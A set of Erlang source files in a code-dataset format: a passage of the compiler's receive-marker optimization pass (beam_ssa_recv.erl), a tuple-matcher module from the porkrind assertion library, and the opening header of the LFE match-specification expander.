{Markers, Uses, Clears} = plan(Scan),
Mod = optimize(Mod0, Markers, Uses, Clears),
Ws = case proplists:get_bool(recv_opt_info, Opts) of
true -> collect_opt_info(Mod);
false -> []
end,
{ok, Mod, Ws};
none ->
%% No peek_message instructions; just skip it all.
{ok, Mod0, []}
end.
scan(#b_module{body=Fs}) ->
%% Quickly collect all peek_message instructions in this module,
%% allowing us to avoid the expensive building of the module-wide
%% graph of all blocks if there are no receives in this module.
case scan_peek_message(Fs) of
[_|_]=Rs0 ->
Rs = maps:from_list(Rs0),
ModMap = foldl(fun(#b_function{bs=Blocks,args=Args}=F, Acc) ->
FuncId = get_func_id(F),
Acc#{ FuncId => {Blocks, Args} }
end, #{}, Fs),
foldl(fun(F, Scan0) ->
FuncId = get_func_id(F),
Scan = scan_add_vertex({FuncId, ?ENTRY_BLOCK}, Scan0),
scan_function(FuncId, F, Scan)
end,
#scan{ module = ModMap, recv_candidates = Rs }, Fs);
[] ->
none
end.
scan_peek_message([#b_function{bs=Bs}=F | Fs]) ->
case scan_peek_message_bs(maps:to_list(Bs)) of
[] ->
scan_peek_message(Fs);
[_ | _] = Rs ->
FuncId = get_func_id(F),
[{FuncId, Rs} | scan_peek_message(Fs)]
end;
scan_peek_message([]) ->
[].
scan_peek_message_bs([{Lbl, Blk} | Bs]) ->
case Blk of
#b_blk{is=[#b_set{op=peek_message}=I | _]} ->
[{Lbl, I} | scan_peek_message_bs(Bs)];
#b_blk{} ->
scan_peek_message_bs(Bs)
end;
scan_peek_message_bs([]) ->
[].
get_func_id(#b_function{anno=Anno}) ->
{_,Name,Arity} = maps:get(func_info, Anno),
#b_local{name=#b_literal{val=Name},arity=Arity}.
scan_function(FuncId, #b_function{bs=Blocks}, State) ->
scan_bs(beam_ssa:rpo(Blocks), Blocks, FuncId, State).
scan_bs([Lbl | Lbls], Blocks, FuncId, State0) ->
#b_blk{is=Is} = Blk = map_get(Lbl, Blocks),
State = scan_is(Is, Blk, Lbl, Blocks, FuncId, State0),
scan_bs(Lbls, Blocks, FuncId, State);
scan_bs([], _Blocks, _FuncId, State) ->
State.
scan_is([#b_set{op={succeeded,body}}], Blk, Lbl, _Blocks, FuncId, State) ->
#b_br{bool=#b_var{},succ=Succ} = Blk#b_blk.last, %Assertion.
%% Orphaned markers get recycled very quickly so there's little harm in
%% ignoring exceptions. Clearing specific markers on exceptions requires us
%% to add try/catch everywhere to clear markers before rethrowing, and that
%% isn't worth the bother.
scan_add_edge({FuncId, Lbl}, {FuncId, Succ}, State);
scan_is([#b_set{op=new_try_tag,dst=Dst}], Blk, Lbl, _Blocks, FuncId, State) ->
%% This never throws but the failure label points at a landingpad, so we'll
%% ignore that branch.
#b_br{bool=Dst,succ=Succ} = Blk#b_blk.last, %Assertion.
scan_add_edge({FuncId, Lbl}, {FuncId, Succ}, State);
scan_is([#b_set{op=call,dst=Dst,args=[#b_remote{} | _]}=Call | Is],
Blk, Lbl, Blocks, FuncId, State0) ->
case {Is, Blk#b_blk.last} of
{[], #b_ret{arg=Dst}} ->
scan_is(Is, Blk, Lbl, Blocks, FuncId, State0);
{[#b_set{op={succeeded,body}}], #b_br{bool=Bool,succ=Succ}} ->
#b_var{} = Bool, %Assertion.
State = si_remote_call(Call, Lbl, Succ, Blocks, FuncId, State0),
scan_is(Is, Blk, Lbl, Blocks, FuncId, State);
_ ->
State = si_remote_call(Call, Lbl, Lbl, Blocks, FuncId, State0),
scan_is(Is, Blk, Lbl, Blocks, FuncId, State)
end;
scan_is([#b_set{op=call,dst=Dst,args=[#b_local{}=Callee | Args]}],
#b_blk{last=#b_ret{arg=Dst}}, Lbl, _Blocks, FuncId, State) ->
scan_add_call(tail, Args, Callee, Lbl, FuncId, State);
scan_is([#b_set{op=call,dst=Dst,args=[#b_local{}=Callee | Args]} | Is],
Blk, Lbl, Blocks, FuncId, State0) ->
[#b_set{op={succeeded,body},args=[Dst]}] = Is, %Assertion.
State = scan_add_call(body, Args, Callee, Lbl, FuncId, State0),
scan_is(Is, Blk, Lbl, Blocks, FuncId, State);
scan_is([_I | Is], Blk, Lbl, Blocks, FuncId, State) ->
scan_is(Is, Blk, Lbl, Blocks, FuncId, State);
scan_is([], #b_blk{last=#b_ret{}}, Lbl, _Blocks, FuncId, State) ->
scan_add_edge({FuncId, Lbl}, {FuncId, ?RETURN_BLOCK}, State);
scan_is([], Blk, Lbl, _Blocks, FuncId, State) ->
foldl(fun(Succ, Acc) ->
scan_add_edge({FuncId, Lbl}, {FuncId, Succ}, Acc)
end, State, beam_ssa:successors(Blk)).
%% Adds an edge to the callee, with argument/parameter translation to let us
%% follow specific references.
scan_add_call(Kind, Args, Callee, Lbl, Caller, #scan{module=ModMap}=State0) ->
#{ Callee := {_Blocks, Params} } = ModMap,
{Translation, Inverse} = scan_translate_call(Args, Params, #{}, #{}),
State = scan_add_edge({Caller, Lbl},
{Callee, ?ENTRY_BLOCK},
{Translation, Inverse},
State0),
case Kind of
body ->
scan_add_edge({Callee, ?RETURN_BLOCK},
{Caller, Lbl},
{Inverse, Translation},
State);
tail ->
State
end.
scan_translate_call([Arg | Args], [Param | Params], ArgToParams, ParamToArgs) ->
scan_translate_call(Args, Params,
ArgToParams#{ Arg => Param },
ParamToArgs#{ Param => Arg });
scan_translate_call([], [], ArgToParams, ParamToArgs) ->
{ArgToParams, ParamToArgs}.
scan_add_edge(From, To, State) ->
scan_add_edge(From, To, branch, State).
scan_add_edge(From, To, Label, State0) ->
State = scan_add_vertex(To, scan_add_vertex(From, State0)),
Graph = beam_digraph:add_edge(State#scan.graph, From, To, Label),
State#scan{graph=Graph}.
scan_add_vertex(Vertex, #scan{graph=Graph0}=State) ->
case beam_digraph:has_vertex(Graph0, Vertex) of
true ->
State;
false ->
Graph = beam_digraph:add_vertex(Graph0, Vertex),
State#scan{graph=Graph}
end.
si_remote_call(#b_set{anno=Anno,dst=Dst,args=Args}=Call,
CalledAt, ValidAfter, Blocks, FuncId, State) ->
case si_remote_call_1(Dst, Args, ValidAfter, Blocks) of
{makes_ref, ExtractedAt, Ref} ->
#scan{ref_candidates=Candidates0} = State,
MakeRefs0 = maps:get(FuncId, Candidates0, []),
MakeRef = {Anno, CalledAt, Dst, ExtractedAt, Ref},
Candidates = Candidates0#{ FuncId => [MakeRef | MakeRefs0] },
State#scan{ref_candidates=Candidates};
uses_ref ->
#scan{recv_candidates=Candidates0} = State,
UseRefs0 = maps:get(FuncId, Candidates0, []),
UseRef = {CalledAt, Call},
Candidates = Candidates0#{ FuncId => [UseRef | UseRefs0] },
State#scan{recv_candidates=Candidates};
no ->
State
end.
si_remote_call_1(Dst, [Callee | Args], Lbl, Blocks) ->
MFA = case Callee of
#b_remote{mod=#b_literal{val=Mod},
name=#b_literal{val=Func},
arity=Arity} ->
{Mod, Func, Arity};
_ ->
none
end,
case MFA of
{erlang,alias,A} when 0 =< A, A =< 1 ->
{makes_ref, Lbl, Dst};
{erlang,demonitor,2} ->
case Args of
[_MRef, #b_literal{val=[flush]}] ->
%% If the monitor fired prior to this call, 'flush' will
%% yank out the 'DOWN' message from the queue. Since we
%% want the receive optimization to trigger for that as
%% well, we'll treat it as a receive candidate.
uses_ref;
[_MRef, _Options] ->
no
end;
{erlang,make_ref,0} ->
{makes_ref, Lbl, Dst};
{erlang,monitor,A} when 2 =< A, A =< 3 ->
{makes_ref, Lbl, Dst};
{erlang,spawn_monitor,A} when 1 =< A, A =< 4 ->
RPO = beam_ssa:rpo([Lbl], Blocks),
si_ref_in_tuple(RPO, Blocks, Dst);
{erlang,spawn_request,A} when 1 =< A, A =< 5 ->
{makes_ref, Lbl, Dst};
_ ->
%% As an aside, spawn_opt/2-5 is trivially supported by handling it
%% like spawn_monitor/1-4, but this is not forward-compatible as
%% the return value may be expanded some day. We'll leave it be
%% until we're okay with setting it in stone.
no
end.
si_ref_in_tuple([Lbl | Lbls], Blocks, Tuple) ->
#b_blk{is=Is} = map_get(Lbl, Blocks),
case si_ref_in_tuple_is(Is, Tuple) of
{yes, Ref} -> {makes_ref, Lbl, Ref};
no -> si_ref_in_tuple(Lbls, Blocks, Tuple)
end;
si_ref_in_tuple([], _Blocks, _Tuple) ->
no.
si_ref_in_tuple_is([#b_set{op=get_tuple_element,dst=Ref,
args=[#b_var{}=Tuple,Pos]} | Is],
Tuple) ->
case Pos of
#b_literal{val=1} -> {yes, Ref};
_ -> si_ref_in_tuple_is(Is, Tuple)
end;
si_ref_in_tuple_is([_I | Is], Tuple) ->
si_ref_in_tuple_is(Is, Tuple);
si_ref_in_tuple_is([], _Tuple) ->
no.
%% Plans our optimizations given the module-wide graph and reference/receive
%% candidates.
plan(Scan) ->
#scan{ ref_candidates = RefCandidates,
recv_candidates = ReceiveCandidates,
module = ModMap,
graph = Graph } = Scan,
%% For all blocks that create new references, mark said references as
%% available in all their successors.
RefMap0 = propagate_references(RefCandidates, Graph),
%% For all receive loops, check whether any of the available references are
%% matched in all clauses.
Uses = plan_uses(ReceiveCandidates, RefMap0, ModMap),
%% Limit the reference map to the references that are actually used.
RefMap = intersect_uses(Uses, Graph, RefMap0),
%% Reserve and bind markers when we create a reference that we know will be
%% used.
Markers = plan_markers(RefCandidates, RefMap),
%% Clear markers whenever we jump to a block that doesn't precede a use.
Clears = plan_clears(RefMap, Graph),
{Markers, Uses, Clears}.
%% Builds a map containing reachable references on a per-vertex basis.
propagate_references(Candidates, G) ->
Roots = maps:fold(fun(FuncId, MakeRefs, Acc) ->
[begin
{_, _, _, ExtractedAt, Ref} = MakeRef,
Vertex = {FuncId, ExtractedAt},
{Vertex, Ref}
end || MakeRef <- MakeRefs] ++ Acc
end, [], Candidates),
propagate_references_1(Roots, G, #{}).
propagate_references_1([{Vertex, Ref} | VRefs], G, Acc0) ->
Refs = maps:get(Vertex, Acc0, sets:new([{version, 2}])),
Acc = case sets:is_element(Ref, Refs) of
true ->
%% Already visited
Acc0;
false ->
Acc1 = Acc0#{ Vertex => sets:add_element(Ref, Refs) },
Next = pr_successors(beam_digraph:out_edges(G, Vertex), Ref),
propagate_references_1(Next, G, Acc1)
end,
propagate_references_1(VRefs, G, Acc);
propagate_references_1([], _G, Acc) ->
Acc.
pr_successors([{_From, To, branch} | Edges], Ref) ->
[{To, Ref} | pr_successors(Edges, Ref)];
pr_successors([{{_, FromLbl}, To, {Translation, _Inverse}} | Edges], Ref) ->
case Translation of
#{ Ref := Param } when FromLbl =/= ?RETURN_BLOCK ->
%% We ignore return edges to avoid leaking markers to functions
%% that lack them. Consider the following:
%%
%% t(NotMarker) -> id(NotMarker), receive NotMarker -> ok end.
%% g() -> id(make_ref()).
%% id(I) -> I.
%%
%% Since id/1 receives a potential marker from at least one source,
%% its argument is always treated as a marker. Propagating this
%% back to all callers means that `NotMarker` will be treated as a
%% marker after the call to id/1, enabling the optimization in the
%% following receive. This would not be dangerous but it's a
%% pessimization we'd rather avoid.
[{To, Param} | pr_successors(Edges, Ref)];
#{} ->
pr_successors(Edges, Ref)
end;
pr_successors([], _Ref) ->
[].
%% Returns the starting vertex of all suitable receive loops, together with the
%% references we can use to jumpstart them.
plan_uses(Candidates, RefMap, ModMap) ->
maps:fold(fun(FuncId, Receives, Acc) ->
#{ FuncId := {Blocks, _Params} } = ModMap,
case plan_uses_1(Receives, FuncId, Blocks, RefMap) of
[_|_]=Uses -> Acc#{ FuncId => Uses };
[] -> Acc
end
end, #{}, Candidates).
plan_uses_1([{Lbl, I} | Receives], FuncId, Blocks, RefMap) ->
case RefMap of
#{ {FuncId, Lbl} := Refs } ->
case search(fun(Ref) ->
pu_is_ref_used(I, Ref, Lbl, Blocks)
end, sets:to_list(Refs)) of
{value, Ref} ->
Use = {Lbl, I, Ref},
[Use | plan_uses_1(Receives, FuncId, Blocks, RefMap)];
false ->
plan_uses_1(Receives, FuncId, Blocks, RefMap)
end;
#{} ->
plan_uses_1(Receives, FuncId, Blocks, RefMap)
end;
plan_uses_1([], _FuncId, _Blocks, _RefMap) ->
[].
%% Checks whether `Ref` matches a part of the `Msg` in all clauses of the given
%% receive.
pu_is_ref_used(#b_set{op=call,args=[Callee | Args]}, Ref, _Lbl, _Blocks) ->
MFA = case Callee of
#b_remote{mod=#b_literal{val=Mod},
name=#b_literal{val=Func},
arity=Arity} ->
{Mod, Func, Arity};
_ ->
none
end,
case MFA of
{erlang,demonitor,2} ->
[MRef | _] = Args,
MRef =:= Ref;
_ ->
false
end;
pu_is_ref_used(#b_set{op=peek_message,dst=Msg}=I, Ref, Lbl, Blocks) ->
#b_blk{is=[I | _]} = Blk = map_get(Lbl, Blocks), %Assertion.
Vs = #{Msg=>message,Ref=>ref,ref=>Ref,ref_matched=>false},
case pu_is_ref_used_last(Blk, Vs, Blocks) of
used -> true;
not_used -> false;
done -> false
end.
pu_is_ref_used_last(#b_blk{last=Last}=Blk, Vs, Blocks) ->
SuccVs = case Last of
#b_br{bool=#b_var{}=Bool,succ=Succ,fail=Fail} ->
case Vs of
#{Bool:={is_ref,Matched}} ->
[{Succ,Vs#{ref_matched:=Matched}},
{Fail,Vs#{ref_matched:=not Matched}}];
#{} ->
[{Succ,Vs},{Fail,Vs}]
end;
_ ->
[{Succ,Vs} || Succ <- beam_ssa:successors(Blk)]
end,
%% The receive loop must be terminated before returning.
[_|_] = SuccVs, %Assertion.
pu_ref_used_in(SuccVs, Blocks).
pu_ref_used_in([{L,Vs0}|Ls], Blocks) ->
case pu_is_ref_used_in_1(L, Vs0, Blocks) of
not_used ->
not_used;
used ->
case pu_ref_used_in(Ls, Blocks) of
done -> used;
Result -> Result
end;
done ->
pu_ref_used_in(Ls, Blocks)
end;
pu_ref_used_in([], _) ->
done.
pu_is_ref_used_in_1(L, Vs0, Blocks) ->
#b_blk{is=Is} = Blk = map_get(L, Blocks),
case pu_is_ref_used_is(Is, Vs0) of
#{}=Vs ->
pu_is_ref_used_last(Blk, Vs, Blocks);
Result ->
Result
end.
pu_is_ref_used_is([#b_set{op={bif,Bif},args=Args,dst=Dst}=I|Is],
Vs0) ->
if
Bif =:= '=:='; Bif =:= '==' ->
case pu_is_ref_msg_comparison(Args, Vs0) of
true ->
Vs = Vs0#{Dst=>{is_ref,true}},
pu_is_ref_used_is(Is, Vs);
false ->
pu_is_ref_used_is(Is, Vs0)
end;
true ->
Vs = pu_update_vars(I, Vs0),
pu_is_ref_used_is(Is, Vs)
end;
pu_is_ref_used_is([#b_set{op=remove_message}|_], Vs) ->
case Vs of
#{ref_matched:=true} ->
used;
#{ref_matched:=false} ->
not_used
end;
pu_is_ref_used_is([#b_set{op=recv_next}|_], _Vs) ->
done;
pu_is_ref_used_is([#b_set{op=wait_timeout}|_], _Vs) ->
done;
pu_is_ref_used_is([#b_set{}=I|Is], Vs0) ->
%% The receive loop must be terminated before reaching any side-effecting
%% instructions.
true = beam_ssa:no_side_effect(I), %Assertion.
Vs = pu_update_vars(I, Vs0),
pu_is_ref_used_is(Is, Vs);
pu_is_ref_used_is([], Vs) ->
Vs.
pu_update_vars(#b_set{args=Args,dst=Dst}, Vs) ->
Vars = [V || #b_var{}=V <- Args],
All = lists:all(fun(Var) ->
case Vs of
#{Var:=message} -> true;
#{} -> false
end
end, Vars),
case {Vars,All} of
{[_|_],true} -> Vs#{Dst=>message};
{_,_} -> Vs
end.
%% Returns whether Args denotes a comparison between the reference and message
%% or part of the message.
pu_is_ref_msg_comparison([#b_var{}=V1,#b_var{}=V2], Vs) ->
case Vs of
#{V1:=ref,V2:=message} -> true;
#{V1:=message,V2:=ref} -> true;
#{} -> false
end;
pu_is_ref_msg_comparison(_, _) ->
false.
%% Takes the map of all references available at a given block, and limits it to
%% those that are actually used in (all clauses of) a succeeding receive.
intersect_uses(UsageMap, G, RefMap) ->
Roots = maps:fold(fun(FuncId, Uses, Acc) ->
[begin
Vertex = {FuncId, Lbl},
{Vertex, Ref}
end || {Lbl, _I, Ref} <- Uses] ++ Acc
end, [], UsageMap),
intersect_uses_1(Roots, G, RefMap, #{}).
intersect_uses_1([{Vertex, Ref} | Vs], G, RefMap, Acc0) ->
PossibleRefs = maps:get(Vertex, RefMap, sets:new([{version, 2}])),
ActiveRefs0 = maps:get(Vertex, Acc0, sets:new([{version, 2}])),
Acc = case {sets:is_element(Ref, PossibleRefs),
sets:is_element(Ref, ActiveRefs0)} of
{true, false} ->
%% This block lies between reference creation and the receive
%% block, add it to the intersection.
Next = iu_predecessors(beam_digraph:in_edges(G, Vertex), Ref),
ActiveRefs = sets:add_element(Ref, ActiveRefs0),
intersect_uses_1(Next, G, RefMap,
Acc0#{ Vertex => ActiveRefs });
{false, _} ->
%% This block does not succeed the creation of the
%% reference. Ignore it.
Acc0;
{_, true} ->
%% We've already handled this block, move on.
Acc0
end,
intersect_uses_1(Vs, G, RefMap, Acc);
intersect_uses_1([], _G, _RefMap, Acc) ->
Acc.
iu_predecessors([{From, _To, branch} | Edges], Ref) ->
[{From, Ref} | iu_predecessors(Edges, Ref)];
iu_predecessors([{From, _To, {_Translation, Inverse}} | Edges], Ref) ->
case Inverse of
#{ Ref := #b_var{}=Arg } ->
[{From, Arg} | iu_predecessors(Edges, Ref)];
#{} ->
%% `Ref` is not a function argument (created in first block) or was
%% passed as a literal on this call, ignore it.
iu_predecessors(Edges, Ref)
end;
iu_predecessors([], _Ref) ->
[].
%% Returns all candidates that are known to be used in at least one receive.
plan_markers(Candidates, UsageMap) ->
maps:fold(fun(FuncId, MakeRefs, Acc) ->
case plan_markers_1(MakeRefs, FuncId, UsageMap) of
[_|_]=Marks -> Acc#{ FuncId => Marks };
[] -> Acc
end
end, #{}, Candidates).
plan_markers_1(MakeRefs0, FuncId, UsageMap) ->
[Marker || {_, _, _, ExtractedAt, Ref}=Marker <- MakeRefs0,
case UsageMap of
#{ {FuncId, ExtractedAt} := Refs } ->
sets:is_element(Ref, Refs);
#{} ->
false
end].
plan_clears(UsageMap, Graph) ->
maps:fold(fun({FuncId, _}=Vertex, ActiveRefs, Acc) ->
Edges = beam_digraph:out_edges(Graph, Vertex),
case plan_clears_1(Edges, ActiveRefs, UsageMap) of
[_|_]=Clears ->
Clears0 = maps:get(FuncId, Acc, []),
Acc#{ FuncId => Clears ++ Clears0 };
[] ->
Acc
end
end, #{}, UsageMap).
plan_clears_1([{From, To, branch} | Edges], ActiveRefs, UsageMap) ->
%% Clear all references that are no longer active on the `To` block.
ToRefs = maps:get(To, UsageMap, sets:new([{version, 2}])),
Refs = sets:subtract(ActiveRefs, ToRefs),
{FuncId, FromLbl} = From,
{FuncId, ToLbl} = To,
[{FromLbl, ToLbl, Ref} || Ref <- sets:to_list(Refs)]
++ plan_clears_1(Edges, ActiveRefs, UsageMap);
plan_clears_1([{_From, _To, {_, _}} | Edges], ActiveRefs, UsageMap) ->
%% We don't need to clear references on calls: those we haven't passed will
%% remain valid after we return, and those we do pass will be cleared by
%% the callee when necessary.
plan_clears_1(Edges, ActiveRefs, UsageMap);
plan_clears_1([], _ActiveRefs, _UsageMap) ->
[].
optimize(#b_module{body=Fs0}=Mod, Markers, Uses, Clears) ->
Fs = [optimize_1(F, Markers, Uses, Clears) || F <- Fs0],
Mod#b_module{body=Fs}.
optimize_1(#b_function{bs=Blocks0,cnt=Count0}=F, Markers, Uses, Clears) ->
FuncId = get_func_id(F),
{Blocks1, Count1} = insert_markers(maps:get(FuncId, Markers, []),
Blocks0, Count0),
{Blocks2, Count2} = insert_uses(maps:get(FuncId, Uses, []),
Blocks1, Count1),
{Blocks, Count} = insert_clears(maps:get(FuncId, Clears, []),
Blocks2, Count2),
F#b_function{bs=Blocks,cnt=Count}.
insert_markers([{Anno, CreatedAt, Dst, ExtractedAt, Ref} | Markers],
Blocks0, Count0) ->
{MarkerVar, Blocks1, Count1} =
insert_reserve(CreatedAt, Dst, Anno, Blocks0, Count0),
{Blocks, Count} =
insert_bind(ExtractedAt, Ref, MarkerVar, Blocks1, Count1),
insert_markers(Markers, Blocks, Count);
insert_markers([], Blocks, Count) ->
{Blocks, Count}.
insert_reserve(Lbl, Dst, Anno, Blocks0, Count0) ->
#{ Lbl := #b_blk{is=Is0}=Blk } = Blocks0,
Var = #b_var{name={'@ssa_recv_marker', Count0}},
Count = Count0 + 1,
Reserve = #b_set{anno=Anno,op=recv_marker_reserve,args=[],dst=Var},
Is = insert_reserve_is(Is0, Reserve, Dst),
Blocks = Blocks0#{ Lbl := Blk#b_blk{is=Is} },
{Var, Blocks, Count}.
insert_reserve_is([#b_set{dst=Var} | _]=Is, Reserve, Var) ->
[Reserve | Is];
insert_reserve_is([I | Is], Reserve, Var) ->
[I | insert_reserve_is(Is, Reserve, Var)].
insert_bind(Lbl, Ref, Marker, Blocks0, Count0) ->
#{ Lbl := #b_blk{is=Is0}=Blk } = Blocks0,
Ignored = #b_var{name={'@ssa_ignored', Count0}},
Count = Count0 + 1,
Bind = #b_set{ op=recv_marker_bind,
args=[Marker,Ref],
dst=Ignored },
Is = insert_bind_is(Is0, Bind),
Blocks = Blocks0#{ Lbl := Blk#b_blk{is=Is} },
{Blocks, Count}.
insert_bind_is([#b_set{}, #b_set{op={succeeded,_}}]=Is, Bind) ->
[Bind | Is];
insert_bind_is([#b_set{op=new_try_tag}]=Is, Bind) ->
[Bind | Is];
insert_bind_is([#b_set{op=Op}=I | Is], Bind) ->
true = Op =/= bs_put, %Assertion.
[I | insert_bind_is(Is, Bind)];
insert_bind_is([], Bind) ->
[Bind].
insert_uses([{_Lbl, #b_set{op=call}, _Ref} | Uses], Blocks, Count) ->
%% The callee uses the marker internally. There's no need to emit a use
%% here.
insert_uses(Uses, Blocks, Count);
insert_uses([{Lbl, #b_set{op=peek_message}=Peek0, Ref} | Uses],
Blocks0, Count) ->
#{ Lbl := #b_blk{is=Is0}=Blk } = Blocks0,
[Peek0 | Is] = Is0, %Assertion.
Peek = Peek0#b_set{args=[Ref]},
Blocks = Blocks0#{ Lbl := Blk#b_blk{is=[Peek | Is]} },
insert_uses(Uses, Blocks, Count);
insert_uses([], Blocks, Count) ->
{Blocks, Count}.
insert_clears(Clears0, Blocks0, Count0) ->
{Insertions, Count} = insert_clears_1(Clears0, Count0, []),
beam_ssa:insert_on_edges(Insertions, Blocks0, Count).
insert_clears_1([{From, To, Ref} | Clears], Count0, Acc) ->
Ignored = #b_var{name={'@ssa_ignored', Count0}},
Count = Count0 + 1,
Clear = #b_set{op=recv_marker_clear,args=[Ref],dst=Ignored},
insert_clears_1(Clears, Count, [{From, To, [Clear]} | Acc]);
insert_clears_1([], Count, Acc) ->
{Acc, Count}.
%%%
%%% +recv_opt_info
%%%
collect_opt_info(#b_module{body=Fs}) ->
coi_1(Fs, []).
coi_1([#b_function{args=Args,bs=Blocks}=F | Fs], Acc0) ->
Lbls = beam_ssa:rpo(Blocks),
Where = beam_ssa:get_anno(location, F, []),
{Defs, _} = foldl(fun(Var, {Defs0, Index0}) ->
Defs = Defs0#{ Var => {parameter, Index0}},
Index = Index0 + 1,
{Defs, Index}
end, {#{}, 1}, Args),
Acc = coi_bs(Lbls, Blocks, Where, Defs, Acc0),
coi_1(Fs, Acc);
coi_1([], Acc) ->
Acc.
coi_bs([Lbl | Lbls], Blocks, Where, Defs0, Ws0) ->
#{ Lbl := #b_blk{is=Is,last=Last} } = Blocks,
{Defs, Ws} = coi_is(Is, Last, Blocks, Where, Defs0, Ws0),
coi_bs(Lbls, Blocks, Where, Defs, Ws);
coi_bs([], _Blocks, _Where, _Defs, Ws) ->
Ws.
coi_is([#b_set{anno=Anno,op=peek_message,args=[#b_var{}]=Args } | Is],
Last, Blocks, Where, Defs, Ws) ->
[Creation] = coi_creations(Args, Blocks, Defs), %Assertion.
Warning = make_warning({used_receive_marker, Creation}, Anno, Where),
coi_is(Is, Last, Blocks, Where, Defs, [Warning | Ws]);
coi_is([#b_set{anno=Anno,op=peek_message,args=[#b_literal{}] } | Is],
Last, Blocks, Where, Defs, Ws) ->
%% Is this a selective receive?
#b_br{succ=NextMsg} = Last,
#{ NextMsg := #b_blk{is=NextIs} } = Blocks,
Info = case NextIs of
[#b_set{op=remove_message} | _] -> matches_any_message;
_ -> unoptimized_selective_receive
end,
Warning = make_warning(Info, Anno, Where),
coi_is(Is, Last, Blocks, Where, Defs, [Warning | Ws]);
coi_is([#b_set{anno=Anno,op=recv_marker_reserve} | Is],
Last, Blocks, Where, Defs, Ws) ->
Warning = make_warning(reserved_receive_marker, Anno, Where),
coi_is(Is, Last, Blocks, Where, Defs, [Warning | Ws]);
coi_is([#b_set{anno=Anno,op=call,dst=Dst,args=[#b_local{} | Args] }=I | Is],
Last, Blocks, Where, Defs0, Ws0) ->
Defs = Defs0#{ Dst => I },
Ws = [make_warning({passed_marker, Creation}, Anno, Where)
|| #b_set{}=Creation <- coi_creations(Args, Blocks, Defs)] ++ Ws0,
coi_is(Is, Last, Blocks, Where, Defs, Ws);
coi_is([#b_set{dst=Dst}=I | Is], Last, Blocks, Where, Defs0, Ws) ->
Defs = Defs0#{ Dst => I },
coi_is(Is, Last, Blocks, Where, Defs, Ws);
coi_is([], _Last, _Blocks, _Where, Defs, Ws) ->
{Defs, Ws}.
coi_creations([Var | Vars], Blocks, Defs) ->
case Defs of
#{ Var := #b_set{op=call,dst=Dst,args=Args}=Call } ->
case si_remote_call_1(Dst, Args, ?ENTRY_BLOCK, Blocks) of
{makes_ref, _, _} ->
[Call | coi_creations(Vars, Blocks, Defs)];
_ ->
coi_creations(Vars, Blocks, Defs)
end;
#{ Var := #b_set{op=get_tuple_element,args=[Tuple|_]}} ->
coi_creations([Tuple | Vars], Blocks, Defs);
#{ Var := {parameter, _}=Parameter } ->
[Parameter | coi_creations(Vars, Blocks, Defs)];
#{} ->
coi_creations(Vars, Blocks, Defs)
end;
coi_creations([], _Blocks, _Defs) ->
[].
make_warning(Term, Anno, Where) ->
{File, Line} = maps:get(location, Anno, Where),
{File,[{Line,?MODULE,Term}]}.
format_opt_info(matches_any_message) ->
"INFO: receive matches any message, this is always fast";
format_opt_info({passed_marker, Creation}) ->
io_lib:format("INFO: passing reference ~ts",
[format_ref_creation(Creation)]);
format_opt_info({used_receive_marker, Creation}) ->
io_lib:format("OPTIMIZED: all clauses match reference ~ts",
[format_ref_creation(Creation)]);
format_opt_info(reserved_receive_marker) ->
"OPTIMIZED: reference used to mark a message queue position";
format_opt_info(unoptimized_selective_receive) ->
"NOT OPTIMIZED: all clauses do not match a suitable reference".
format_ref_creation({parameter, Index}) ->
io_lib:format("in function parameter ~w", [Index]);
format_ref_creation(#b_set{op=call,anno=Anno,args=[Callee|_]}) ->
#b_remote{name=#b_literal{val=F},arity=A} = Callee,
{File, Line} = maps:get(location, Anno, {"",1}),
io_lib:format("created by ~p/~p at ~ts:~w", [F, A, File, Line]). | lib/compiler/src/beam_ssa_recv.erl | 0.605099 | 0.415907 | beam_ssa_recv.erl | starcoder |
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(porkrind_tuples).
-include("porkrind_internal.hrl").
-export([
has_tuple_size/1,
has_element_at/2
]).
has_tuple_size(Size) when is_integer(Size), Size >= 0 ->
M = #'porkrind.matcher'{
name = has_tuple_size,
args = [Size],
match = fun(Value) ->
case tuple_size(Value) of
Size ->
ok;
Mismatch ->
?PR_FAIL({mismatch, Value, Mismatch})
end
end,
reason = fun({mismatch, Value, Mismatch}) ->
io_lib:format("~w has size ~b, not ~b", [Value, Mismatch, Size])
end
},
porkrind_logic:all_of([
porkrind_types:is_tuple(),
M
]).
has_element_at(Index, Matcher0) when is_integer(Index), Index >= 1 ->
Matcher = porkrind_util:maybe_wrap(Matcher0),
M = #'porkrind.matcher'{
name = has_element_at,
args = [Index, Matcher0],
match = fun(Value) ->
case tuple_size(Value) of
S when S >= Index ->
porkrind:match(element(Index, Value), Matcher);
S ->
?PR_FAIL({too_small, Value, S})
end
end,
reason = fun
({too_small, Value, Size}) ->
Args = [Value, Size, Index],
io_lib:format("~w has size ~b, which is smaller than ~b", Args)
end
},
porkrind_logic:all_of([
porkrind_types:is_tuple(),
M
]). | src/porkrind_tuples.erl | 0.694924 | 0.415077 | porkrind_tuples.erl | starcoder |
%% Copyright (c) 2008-2020 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% File : lfe_ms.erl
%% Author : <NAME>
%% Purpose : Lisp Flavoured Erlang match specification expander.
%% Expand match specification into vanilla compatible data
%% structure. We assume that all macros in the match spec have
%% already been expanded. These functions are intended to be used
%% within macros so they return code which when evaluated return the
%% match-spec.
%%
%% Note that the vanilla match spec expander starts numbering dollar
%% variables from 1. We do the same to be compatible.
-module(lfe_ms).
-export([expand/1,expand/2,format_error/1]).
-import(lists, [foldr/3,mapfoldl/3]).
-include("lfe.hrl").
%% ets:test_ms/2.
%% format_error(Error) -> ErrorString.
format_error(match_spec_head) -> "Illegal number of head arguments".
-record(ms, {dc=1, %Dollar variable count from 1
bs=[], %Variable/$var bindings
dialect=ets, %Which dialect are we doing
where=guard %Where in spec head/guard/body
}).
%% expand(MSBody) -> Expansion.
%% expand(Dialect, MSBody) -> Expansion.
